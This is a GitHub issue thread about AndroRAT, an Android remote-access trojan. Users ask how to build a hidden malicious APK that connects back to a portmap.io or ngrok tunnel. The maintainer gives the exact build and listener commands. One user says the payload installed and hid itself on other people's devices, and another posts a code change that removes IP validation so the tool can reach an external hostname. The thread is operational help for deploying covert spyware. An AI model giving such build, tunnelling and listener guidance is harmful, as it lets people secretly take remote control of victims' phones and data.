Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

not able to use portmap io #40

Closed
vipuluthaiah opened this issue Oct 30, 2020 · 9 comments
Closed

not able to use portmap io #40

vipuluthaiah opened this issue Oct 30, 2020 · 9 comments

Comments

@vipuluthaiah
Copy link

how to config ports?
eg:python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk

my portmap.io is:
tcp://DarkNotch-49754.portmap.host:49754 => 8989

how should i config the ports
is it

python androRAT.py --build -i 193.161.193.99 -p 49754 -o evil.apk

or
python androRAT.py --build -i 193.161.193.99 -p 8989 -o evil.apk

and how should i listen to the connection?
python androRAT.py --shell -i 193.161.193.99 -p 49754
or
python androRAT.py --shell -i 193.161.193.99 -p 8989

@karma9874
Copy link
Owner

python androRAT.py --build -i 193.161.193.99 -p 49754 -o evil.apk
python androRAT.py --shell -i 0.0.0.0 -p 8989

@vipuluthaiah
Copy link
Author

app installed ...on diff devices like:moto e4 plus andorid 7.1
and samsung tab
i am not getting connection back!
d80e6da1-91bc-4068-b73e-567f9511aea3
the payload was successfully installed and it hidded too..
what can be the issue

@karma9874
Copy link
Owner

are you sure 193.161.193.99 is ip of DarkNotch?

@vipuluthaiah
Copy link
Author

image

@rajat7k
Copy link

rajat7k commented Nov 3, 2020

i m also unable to use portmap.io......is there any other way to make connection..??

@karma9874
Copy link
Owner

ngrok

@rajat7k
Copy link

rajat7k commented Nov 3, 2020

in portmap.io its make connection but no command is running and after one command connection get break....and not able to connect again

Screenshot (106)

@mr-bipolar
Copy link

mr-bipolar commented Nov 15, 2020

open AndroRat.py then remove this 2 lines..

if is_valid_ip(args.ip):
ip = args.ip
else:
# print(Fore.RED+"Not a valid IP"+Fore.RESET) --> hide or remove
# sys.exit() ---> hide or remove
ip = args.ip <-- add this line

then save..

my portmap link - tcp://name.portmap.io:1234 => 4444

androRAT.py --build -i name.portmap.io -p 1234

connection back command

androRAT.py --shell -i 0.0.0.0 -p 4444
Or


ifconfig tun0

add your portmap ip --> -i <-- here

androRAT.py --shell -i 10.9.124.112 -p 4444


#sorry for my bad english <3

@karma9874
Copy link
Owner

Added ngrok support to the app, so now you can use --ngrok mode which will use ngrok and create a reverse proxy between the localhost and your android app

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants